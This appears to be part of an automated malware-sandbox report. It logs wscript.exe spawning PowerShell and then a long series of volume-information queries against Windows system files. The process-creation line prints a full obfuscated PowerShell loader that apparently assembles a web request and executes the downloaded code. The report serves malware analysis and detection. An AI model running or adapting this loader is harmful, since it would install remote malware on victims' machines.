lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
